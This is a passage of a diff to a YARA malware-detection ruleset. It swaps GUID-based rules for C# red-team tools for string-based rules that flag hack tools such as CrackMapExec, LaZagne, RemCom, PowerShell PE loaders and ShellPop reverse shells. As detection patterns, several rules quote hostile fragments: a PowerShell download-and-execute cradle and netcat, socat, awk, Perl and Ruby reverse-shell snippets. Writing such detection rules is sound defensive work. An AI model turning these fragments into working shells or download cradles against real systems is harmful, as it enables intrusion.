+		$s3 = "Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Cinarat : FILE
+rule SIGNATURE_BASE_Powershell_Mal_Hacktool_Gen : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c6b4c919-0fc6-5096-b29b-963142a2c831"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/wearelegal/CinaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L369-L383"
+		description = "Detects PowerShell hack tool samples - generic PE loader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d1fc4594-d816-5d02-bff6-3f220477b555"
+		date = "2017-11-02"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4076-L4092"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d3e006450f3bd35d9d8b0d5c74470f555917d8b3583285ac3ac925ce2a83972b"
+		logic_hash = "273222cde3ff155cef09c25192dcb4865179e8172e625fe8f43b21a13fe1a170"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d442304ca839d75b34e30e49a8b9437b5ab60b74d85ba9005642632ce7038b32"
 
 	strings:
-		$typelibguid0lo = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii wide
-		$typelibguid1lo = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii wide
+		$x1 = "$PEBytes32 = 'TVqQAAMAAAAEAAAA" wide
+		$x2 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword wide
+		$x3 = "@($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword wide
+		$x4 = "(Shellcode: LoadLibraryA.asm)" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 8000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Toxiceye : FILE
+rule SIGNATURE_BASE_Sig_Remoteadmin_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0b7b62ce-9c24-5d81-8d87-22f6e461a62b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/LimerBoy/ToxicEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L385-L398"
+		description = "Detects strings from well-known APT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "da55084c-ec1f-5800-a614-189dce7b5820"
+		date = "2017-12-03"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4094-L4108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "58070408e4c08d20a3f37a2bf59f4b125ef4608e9ee3e7ed5fe1e26ad51b6c88"
-		score = 75
+		logic_hash = "81912bbfc1f6ac3ec7c54fc935b9ed531c97ad509cf2c096a19e638836cd0baf"
+		score = 45
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii wide
+		$ = "Radmin, Remote Administrator" wide
+		$ = "Radmin 3.0" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Disable_Windows_Defender : FILE
+rule SIGNATURE_BASE_Remcom_Remotecommandexecution
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9a673427-e66e-594b-942a-64a2272319f3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L400-L413"
+		description = "Detects strings from RemCom tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90b4ce3c-a690-5b6e-95e8-7e5dc8270152"
+		date = "2017-12-28"
+		modified = "2025-12-18"
+		reference = "https://goo.gl/tezXZt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4110-L4125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "65cc86433a3c4cb22ad54065b90010a0f3eb18ad8791c45343d103deea880195"
-		score = 75
+		logic_hash = "c39a09c8d0c1799febcb4d9eafece43f8b21e7ffc277fdfad6c235eb1a201697"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii wide
+		$ = "\\\\.\\pipe\\%s%s%d"
+		$ = "%s\\pipe\\%s%s%d%s"
+		$ = "\\ADMIN$\\System32\\%s%s"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke_Poc : FILE
+rule SIGNATURE_BASE_Crackmapexec_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/dtrizna/DInvoke_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L415-L428"
+		description = "Detects CrackMapExec hack tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9fcfba98-7ba1-5810-99b7-62ad2b1aa4c0"
+		date = "2018-04-06"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4127-L4143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51299abecf7244d150e7c148b5896cd64bcf5817a9a962013d6a986891bd321f"
-		score = 75
+		logic_hash = "fa05fa41d6aaed45a9b44806a310fdb584874f7eb382e576b36e6d1db87cef88"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
 
 	strings:
-		$typelibguid0lo = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii wide
+		$s1 = "core.scripts.secretsdump(" ascii
+		$s2 = "core.scripts.samrdump(" ascii
+		$s3 = "core.uacdump(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Reverseshell : FILE
+
+rule SIGNATURE_BASE_SUSP_Imphash_Passrevealer_PY_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "876932d5-a65d-5230-9cb8-24038ad8af0d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/chango77747/ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L430-L444"
+		description = "Detects an imphash used by password revealer and hack tools (some false positives with hardware driver installers)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9462dfc4-2feb-591d-ac0c-ba02f093c216"
+		date = "2018-04-06"
+		modified = "2021-11-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4145-L4163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf8220444b6ffe810451e4754f8561e80acd99f8b5fbb013e8eef488b3c4243e"
-		score = 75
+		logic_hash = "684e901eebf47e2bd8b25fd302963c2761376ce4754d74f9e6f1eb3024c89144"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
 
 	strings:
-		$typelibguid0lo = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii wide
-		$typelibguid1lo = "8abe8da1-457e-4933-a40d-0958c8925985" ascii wide
+		$fp1 = "Assmann Electronic GmbH" ascii wide
+		$fp2 = "Oculus VR" ascii wide
+		$fp3 = "efm8load" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and pe.imphash ( ) == "ed61beebc8d019dd9bec823e2d694afd" and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpc2 : FILE
+rule SIGNATURE_BASE_MAL_Unknown_Pwdumper_Apr18_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2ed6d74e-2b95-5c70-807a-4da5e62f5853"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SharpC2/SharpC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L446-L464"
+		description = "Detects sample from unknown sample set - IL origin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2431d562-dcd8-5d21-8406-7d2567b6eca9"
+		date = "2018-04-06"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4165-L4184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5439cbe057d5735e3d35ac01966fc65ca0727e1c1c353564d38d1c20bb04484a"
+		logic_hash = "bf0dff02bdfa239336b2bc865f2a9aed6d20cafb059caa87a60aa30269dd94b5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d435e7b6f040a186efeadb87dd6d9a14e038921dc8b8658026a90ae94b4c8b05"
+		hash2 = "8c35c71838f34f7f7a40bf06e1d2e14d58d9106e6d4e6f6e9af732511a126276"
 
 	strings:
-		$typelibguid0lo = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii wide
-		$typelibguid1lo = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii wide
-		$typelibguid2lo = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii wide
-		$typelibguid3lo = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii wide
-		$typelibguid4lo = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii wide
-		$typelibguid5lo = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii wide
+		$s1 = "loaderx86.dll" fullword ascii
+		$s2 = "tcpsvcs.exe" fullword wide
+		$s3 = "%Program Files, Common FOLDER%" fullword wide
+		$s4 = "%AllUsers, ApplicationData FOLDER%" fullword wide
+		$s5 = "loaderx86" fullword ascii
+		$s6 = "TNtDllHook$" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyexec : FILE
+
+rule SIGNATURE_BASE_Processinjector_Gen : HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "853b630d-77ba-5847-a129-c9fa0538f81b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/HackingThings/SneakyExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L466-L479"
+		description = "Detects a process injection utility that can be used ofr good and bad purposes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b0b6ac7-8432-5f93-b389-c2356ec75113"
+		date = "2018-04-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4186-L4207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb2d505666c4395c9e43607468332c7559807d4da063eb69b31638f2520fee0e"
-		score = 75
+		logic_hash = "90d200e79c97911b105e592549bc2c04fb09ce841413c30117d421b45bb9988c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d"
 
 	strings:
-		$typelibguid0lo = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii wide
+		$x1 = "Error injecting remote thread in process:" fullword ascii
+		$s5 = "[-] Error getting access to process: %ld!" fullword ascii
+		$s6 = "--process-name <name>  Process name to inject" fullword ascii
+		$s12 = "No injection target has been provided!" fullword ascii
+		$s17 = "[-] An app path is required when not injecting!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( pe.imphash ( ) == "d27e0fa013d7ae41be12aaf221e41f9b" or 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Urbanbishoplocal : FILE
+rule SIGNATURE_BASE_Lazagne_PW_Dumper
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "53b690ec-7d20-5e46-b368-b458ce56073d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/slyd0g/UrbanBishopLocal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L481-L494"
+		description = "Detects Lazagne PW Dumper"
+		author = "Markus Neis / Florian Roth"
+		id = "1904029e-9336-5278-ae2e-4bc853316600"
+		date = "2018-03-22"
+		modified = "2025-12-18"
+		reference = "https://github.com/AlessandroZ/LaZagne/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4209-L4223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd0ded2fbfbf0fb8c53928e3f1bc4425bfa6112b92b609f421d517f931814faa"
-		score = 75
+		logic_hash = "2eac81d5cecdaca7eeaa83be70a688a595f8bbf54679ee565ba325b9e384552b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii wide
+		$s1 = "Crypto.Hash" fullword ascii
+		$s2 = "laZagne" fullword ascii
+		$s3 = "impacket.winregistry" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshell : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Tclsh : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5966be44-c010-5c63-9576-1aaf36397d6c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/cobbr/SharpShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L496-L510"
+		description = "Detects suspicious TCLsh popshell"
+		author = "Tobias Michalski"
+		id = "24f6b626-383e-54c9-abd4-bd67c37af937"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4225-L4237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d49e6a85514fb47bd6875372cbbc8fc1d30e8572ce6e5caa594da07f58d4c06"
-		score = 75
+		logic_hash = "622805e8067f5158d82783971dcf31e8db05f1d52a38bd1ec3e76ddbbd78032b"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f49d76d70d14bbe639a3c16763d3b4bee92c622ecb1c351cb4ea4371561e133"
 
 	strings:
-		$typelibguid0lo = "bdba47c5-e823-4404-91d0-7f6561279525" ascii wide
-		$typelibguid1lo = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii wide
+		$s1 = "{ puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evilwmiprovider : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Ruby : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3a6cf00e-28c4-5e6f-a28d-b3f28fca6eed"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/sunnyc7/EvilWMIProvider"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L512-L525"
+		description = "Detects suspicious ruby shellpop"
+		author = "Tobias Michalski"
+		id = "cb3a93d5-02a1-5a49-b37e-3f9312b993ea"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4239-L4251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "431aa788d1cd192803ad7a5cc66ea48b7a83d47e009c42280e3e77c6ffb8662c"
-		score = 75
+		logic_hash = "aa076540ef01d04117d3340f4d84c21f79acfc558ed4aa585d801b6a6bc797a2"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b425b37f3520fd8c778928cc160134a293db0ce6d691e56a27894354b04f783"
 
 	strings:
-		$typelibguid0lo = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii wide
+		$x1 = ");while(cmd=c.gets);IO.popen(cmd,'r'){" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gadgettojscript : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Awk : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e296795f-d006-52a9-92c4-fb60c930564b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/med0x2e/GadgetToJScript"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L527-L541"
+		description = "Detects suspicious AWK Shellpop"
+		author = "Tobias Michalski"
+		id = "92d1e6dd-d758-5df2-b5e5-eb275964551d"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4253-L4266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b072024bc927eaff8bb81bc660dd55a126f9b78e5db591042137b59647631544"
-		score = 75
+		logic_hash = "7d676ffbd1ce083a1b8e34576125fb0805caef4423089cd72a92483467669b78"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7513a0a0ba786b0e22a9a7413491b4011f60af11253c596fa6857fb92a6736fc"
 
 	strings:
-		$typelibguid0lo = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii wide
-		$typelibguid1lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
+		$s1 = "awk 'BEGIN {s = \"/inet/tcp/0/" ascii
+		$s2 = "; while(42) " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Azurecli_Extractor : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Netcat_UDP : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f595545a-a7a6-577c-b3f4-febf7bf1b6c3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/0x09AL/AzureCLI-Extractor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L543-L556"
+		description = "Detects suspicious netcat popshell"
+		author = "Tobias Michalski"
+		id = "67aa53b6-00bc-5d2e-b6f3-37e9121cdd01"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4268-L4281"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c55a291ba3475a7c7faa2a0152c04b01066a3b3569a5fb052c092b08a8e75ae"
-		score = 75
+		logic_hash = "0c85b1275ccf5bbc7f6e0ab0f1fa9d1bce7d56912411f84f9946163191c79576"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d823ad91b315c25893ce8627af285bcf4e161f9bbf7c070ee2565545084e88be"
 
 	strings:
-		$typelibguid0lo = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii wide
+		$s1 = "mkfifo fifo ; nc.traditional -u" ascii
+		$s2 = "< fifo | { bash -i; } > fifo" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Escaper : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Socat : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea95ff3c-0cbb-5230-b5e4-bd8b2ff975eb"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/UAC-Escaper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L558-L571"
+		description = "Detects suspicious socat popshell"
+		author = "Tobias Michalski"
+		id = "23c331ba-217c-5b17-b45e-d553eea76a56"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4283-L4296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8b7315970124c7997ca7d7d21e6c26ac9c905cdbc1ee009f7800b6bc98f9c3d4"
-		score = 75
+		logic_hash = "48c06096b27be11ae12cc38294acb495b739101cabc04e89eb76e93fb42c52df"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "267f69858a5490efb236628260b275ad4bbfeebf4a83fab8776e333ca706a6a0"
 
 	strings:
-		$typelibguid0lo = "95359279-5cfa-46f6-b400-e80542a7336a" ascii wide
+		$s1 = "socat tcp-connect" ascii
+		$s2 = ",pty,stderr,setsid,sigint,sane" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Httpsbeaconshell : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Perl : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d66e3566-6082-570a-a168-f44c9d8c7619"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L573-L586"
+		description = "Detects Shellpop Perl script"
+		author = "Tobias Michalski"
+		id = "d597d213-a70b-5412-adde-791b4d498848"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4298-L4311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4e51832b9a5f7b82da2f11bcb34664b0a8d0308b0e823436f4339233c07213b3"
+		logic_hash = "8f3c5920acdc080b437c15b93e192a00a5037be0323cc04473e238033b7d53ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "32c3e287969398a070adaad9b819ee9228174c9cb318d230331d33cda51314eb"
 
 	strings:
-		$typelibguid0lo = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii wide
+		$ = "perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);" ascii
+		$ = ";STDIN->fdopen(\\$c,r);$~->fdopen(\\$c,w);s" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Amsiscanbufferbypass : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Python : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
